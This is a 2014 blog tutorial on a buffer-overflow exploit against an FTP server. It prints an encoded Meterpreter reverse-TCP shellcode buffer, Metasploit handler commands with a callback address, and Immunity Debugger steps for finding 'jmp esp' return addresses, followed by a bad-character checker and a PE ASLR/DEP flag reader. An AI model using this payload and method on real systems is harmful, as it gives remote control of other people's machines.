Saturday, November 22, 2014

Notes created for Immunity Debugger

Notes on generating a payload in Python-script form, setting up a multi/handler listener, and then running the exploit against that handler to get a Meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates the payload in Python syntax (-t python), encoded so that none of the bad characters listed after -b (null, line feed, carriage return and space) appear in the output bytes.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\x14\x58\xf0\x12\xbb\x35\x03\x41\x39"
buf += "\x35\xd3\x02\x55\x65\xc3\x4a\xa7\x1d\xe1\x92\xb6\x81"
buf += "\x6c\x73\xeb\x8e\x62\x27\x5d\xa6\x2b\xad\x4d\x19\x9c"
buf += "\x67\x91\x7c"
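Before pasting a generated buffer into the exploit script it is worth confirming that the encoder really kept the bad characters out, since a single stray 0x00 or 0x0a will truncate the string on the way to the target. The following script is an added example, not part of the original notes or of msfvenom: it parses the "buf += ..." listing that -t python emits back into raw bytes and reports the offset of any byte from the -b list. Both sample listings are constructed for the example and are not real payloads.

```python
import re

# Bad characters passed to msfvenom's -b option in the notes above: NUL, LF,
# CR and space, bytes a text-based protocol parser would truncate or mangle.
BAD_CHARS = b"\x00\x0a\x0d\x20"

# Constructed sample in the same "buf += ..." shape that -t python emits.
# The byte values are made up for this example; it is not a payload.
SAMPLE_CLEAN = r'''buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4"
buf += "\xb8\xec\x27\x13"
'''

# Constructed sample with a line feed (0x0a) at offset 2, to show detection.
SAMPLE_BAD = r'''buf =  ""
buf += "\x31\xc0\x0a\x90"
'''

LINE_RE = re.compile(r'\s*buf\s*\+?=\s*"(.*)"\s*$')


def parse_python_payload(text: str) -> bytes:
    r"""Convert msfvenom -t python output back into the raw bytes it encodes.

    Each line has the form buf = "" or buf += "<escapes>". The string body
    is decoded as Python escape syntax (\xNN) and re-encoded with latin-1 so
    every \xNN maps to exactly one byte.
    """
    out = bytearray()
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match is None:
            continue  # ignore blank lines or anything that is not a buf line
        body = match.group(1)
        out += body.encode("ascii").decode("unicode_escape").encode("latin-1")
    return bytes(out)


def find_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, value) pairs for every byte of payload found in bad."""
    return [(offset, value) for offset, value in enumerate(payload) if value in bad]


def check_payload_text(text: str, bad: bytes = BAD_CHARS) -> dict:
    """Parse a -t python listing and report its length and any bad bytes."""
    payload = parse_python_payload(text)
    hits = find_bad_chars(payload, bad)
    return {"length": len(payload), "bad": hits, "clean": not hits}


if __name__ == "__main__":
    for name, sample in (("clean", SAMPLE_CLEAN), ("bad", SAMPLE_BAD)):
        report = check_payload_text(sample)
        print(name, report)
        for offset, value in report["bad"]:
            print(f"  bad byte 0x{value:02x} at offset {offset}")
```

Run it against the real listing by pasting the "buf" lines into a file and passing the file's text to check_payload_text(); a non-empty "bad" list means the -b option was missing a character or the encoder failed and the payload should be regenerated.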

use exploit/multi/handler
set payload windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1

*** With Immunity Debugger we need to find memory addresses that contain a "jmp esp" instruction.

1. Load or attach the FTP server in Immunity Debugger
2. Press the "e" shortcut to open the Modules window listing all of the .dll's loaded in the process
3. Double-click one of them that is not part of the FTP server itself
4. Right-click and go to Search for > "All commands in all modules"
5. Key in the instruction you are searching for: "jmp esp"
6. It then returns a list of "jmp esp" instructions with their memory addresses, for example:
   Windows XP w/ SP3 - MFC42.dll 0x73E32ECF
   Windows XP w/ SP3 - WINMM.dll 0x76B43ADC
   Windows XP w/ SP3 - ADVAPI32.dll 0x77DEF049
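The three addresses above are absolute and only stay valid because those Windows XP SP3 system modules are always mapped at the same base and the stack is executable; a module linked with /DYNAMICBASE is rebased by ASLR at each boot, and /NXCOMPAT lets DEP refuse to execute the stack that "jmp esp" lands on. The script below is an added defensive check, not part of the original notes or of Immunity Debugger: it reads the DllCharacteristics field of a PE file's optional header and reports whether the module opted in to ASLR and DEP. The flag names are the winnt.h constants; build_minimal_pe() constructs a header-only sample so the example runs without a real DLL on disk.

```python
import struct

# DllCharacteristics flags from the PE optional header (winnt.h names).
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # module opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # module is DEP/NX compatible
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400        # image uses no SEH handlers

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def pe_mitigations(image: bytes) -> dict:
    """Report ASLR/DEP related flags for a PE image given as raw file bytes.

    Walks MZ header -> e_lfanew -> PE signature -> COFF header -> optional
    header and reads DllCharacteristics, which sits at offset 70 of the
    optional header for both PE32 and PE32+.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", image, coff + 16)
    opt = coff + 20
    if size_of_optional < 72 or len(image) < opt + 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    (dll_chars,) = struct.unpack_from("<H", image, opt + 70)
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
    }


def build_minimal_pe(dll_characteristics: int, pe32plus: bool = False) -> bytes:
    """Construct a header-only PE image for demonstration (not loadable).

    Only the fields pe_mitigations() reads are filled in; everything else
    is zero. This stands in for a real DLL so the script runs offline.
    """
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Standard optional header sizes without data directories.
    opt_size = 112 if pe32plus else 96
    coff = struct.pack(
        "<HHIIIHH",
        0x8664 if pe32plus else 0x14C,  # Machine: x64 or i386
        0,                              # NumberOfSections
        0, 0, 0,                        # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        opt_size,                       # SizeOfOptionalHeader
        0x2002,                         # Characteristics: EXECUTABLE_IMAGE | DLL
    )
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)


def check_file(path: str) -> dict:
    """Convenience wrapper: run pe_mitigations() on a file on disk."""
    with open(path, "rb") as fh:
        return pe_mitigations(fh.read())


if __name__ == "__main__":
    # A module built like the XP-era ones in the notes: neither flag set, so
    # its base is fixed and an absolute address inside it stays the same.
    legacy = build_minimal_pe(0)
    # A module built with /DYNAMICBASE and /NXCOMPAT.
    hardened = build_minimal_pe(
        IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT
    )
    print("legacy:  ", pe_mitigations(legacy))
    print("hardened:", pe_mitigations(hardened))
```

Pointing check_file() at a copy of the modules listed above (or at the FTP server's own binary) shows which of them would still be at a predictable address; a module with "aslr": False is the kind the search in step 4 turns up addresses in, and it is the first thing to flag when reviewing a server's hardening.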
